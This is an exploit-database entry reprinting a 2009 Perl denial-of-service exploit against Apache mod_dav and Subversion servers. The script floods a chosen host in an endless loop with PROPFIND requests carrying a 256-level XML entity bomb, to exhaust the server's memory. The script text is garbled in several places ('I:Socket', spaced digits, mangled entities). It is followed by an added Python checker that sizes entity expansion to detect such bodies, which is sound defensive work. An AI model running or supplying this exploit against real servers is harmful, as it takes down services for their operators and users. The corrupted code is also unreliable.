Apache mod_dav / svn remote denial of service vulnerability

2009-06-11T00:00:00
ID MYHACK58:62200923532
Type myhack58
Reporter Anonymous
Modified 2009-06-11T00:00:00

Description

Exploiting this vulnerability exhausts all system memory on the target server.

furoffyourcat.pl

Apache mod_dav / svn Remote Denial of Service Exploit

by kcope / June 2009

Will exhaust all system memory

Needs Authentication on normal DAV

This can be especially serious stuff when used against svn (subversion) servers!! Svn might let the PROPFIND slip through without authentication. bwhahaaha :o)

use at your own risk!

############################################################

use I:Socket; use MIME::Base64;

sub usage { print "Apache mod_dav / svn Remote Denial of Service Exploit\n"; print "by kcope in 2 0 0 9\n"; print "usage: perl furoffyourcat.pl <remotehost> <webdav folder> [username] [password]\n"; print "example: perl furoffyourcat.pl svn.XXX.com /projects/\n";exit; }

if ($#ARGV < 1) {usage();}

$hostname = $ARGV[0]; $webdavfile = $ARGV[1];

$username = $ARGV[2]; $password = $ARGV[3];

$|=1;

$BasicAuth = encode_base64("$username:$password"); chomp $BasicAuth;

my $sock = I:Socket::INET->new(PeerAddr => $hostname, PeerPort => 8 0, Proto => 'tcp'); print $sock "PROPFIND $webdavfile HTTP/1.1\r\n"; print $sock "Host: $hostname\r\n"; print $sock "Depth: 0\r\n"; print $sock "Connection: close\r\n"; if ($username ne "") { print $sock "Authorization: Basic $BasicAuth\r\n"; } print $sock "\r\n"; $x = <$sock>;

print $x; if (! ($x =~ /2 0 7/)) { while(<$sock>) { print; } close($sock); print "No PROPFIND on this server and path.\ n"; exit(0); }

$a = ""; for ($i=1;$i<2 5 6;$i++) { # Here you can increase the XML bomb count $k = $i-1; $a .= "<! ENTITY x$i \"&x - $k;&x - $k;\">\n" }

$igzml = "<? xml version=\"1.0\"?& gt;\n" ."& lt;! DOCTYPE REMOTE [\n" ."& lt;! ELEMENT REMOTE ANY>\n" ."& lt;! ENTITY x0 \"foobar\">\n" .$ a ."]& gt;\n" ."& lt;REMOTE>\n" ."& amp;x - $k;\n" ."& lt;/REMOTE>\n";

print "Apache mod_dav / svn Remote Denial of Service Exploit\n"; print "by kcope in 2 0 0 9\n"; print "Launching a DoS Attack...\n";

$ExploitRequest = "PROPFIND $webdavfile HTTP/1.1\r\n" ." Host: $hostname\r\n" ." Depth: 0\r\n";

if ($username ne "") { $ExploitRequest .= "Authorization: Basic $BasicAuth\r\n"; } $ExploitRequest .= "Content-Type: text/xml\r\nContent-Length: ". length($igzml)."\ r\n\r\n" . $igzml;

while(1) { again: my $sock = I:Socket::INET->new(PeerAddr => $hostname, PeerPort => 8 0, Proto => 'tcp') || (goto again);

print $sock $ExploitRequest; print ";Pp"; }

milw0rm.com [2009-06-01]
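
A defensive check for the nested-entity request body described above, as an added example that is not part of the original advisory or script: it computes how large each internal entity would become without ever expanding it, so a WebDAV front end or log-review job can reject or flag the body before an XML parser sees it. The function names, the size limit and the three-level sample document are constructed for illustration.

```python
import re

# Internal general entity declarations: <!ENTITY name "value">
# (parameter entities, "<!ENTITY % ...", are deliberately not matched).
ENTITY_DECL = re.compile(r"""<!ENTITY\s+([\w.\-]+)\s+(["'])(.*?)\2\s*>""", re.S)
ENTITY_REF = re.compile(r"&([\w.\-]+);")
PREDEFINED = {"lt": 1, "gt": 1, "amp": 1, "apos": 1, "quot": 1}

# Constructed sample: a harmless three-level version of the nesting pattern.
SAMPLE = """<?xml version="1.0"?>
<!DOCTYPE REMOTE [
<!ELEMENT REMOTE ANY>
<!ENTITY x0 "foobar">
<!ENTITY x1 "&x0;&x0;">
<!ENTITY x2 "&x1;&x1;">
<!ENTITY x3 "&x2;&x2;">
]>
<REMOTE>&x3;</REMOTE>"""


def expanded_sizes(xml_text):
    """Return ({entity: expanded length}, [cyclic entities]) by arithmetic only."""
    pending = {}
    for m in ENTITY_DECL.finditer(xml_text):
        pending.setdefault(m.group(1), m.group(3))  # first declaration wins
    sizes, resolved, progress = dict(PREDEFINED), {}, True
    while pending and progress:
        progress = False
        for name, value in list(pending.items()):
            refs = ENTITY_REF.findall(value)
            if any(r in pending for r in refs):
                continue  # a dependency (or the entity itself) is not sized yet
            literal = len(ENTITY_REF.sub("", value))
            sizes[name] = resolved[name] = literal + sum(sizes.get(r, 0) for r in refs)
            del pending[name]
            progress = True
    return resolved, sorted(pending)  # whatever never resolved is self-referential


def check_body(xml_text, max_expanded=1_000_000):
    """Decide whether a request body should be rejected before it reaches a parser."""
    sizes, cyclic = expanded_sizes(xml_text)
    largest = max(sizes.values(), default=0)
    return {"reject": bool(cyclic) or largest > max_expanded,
            "largest": largest, "cyclic": cyclic}


if __name__ == "__main__":
    print(check_body(SAMPLE, max_expanded=40))
```

The check bounds the largest single entity; a body that references a moderately sized entity many times in its content needs the same arithmetic applied to the document body as well.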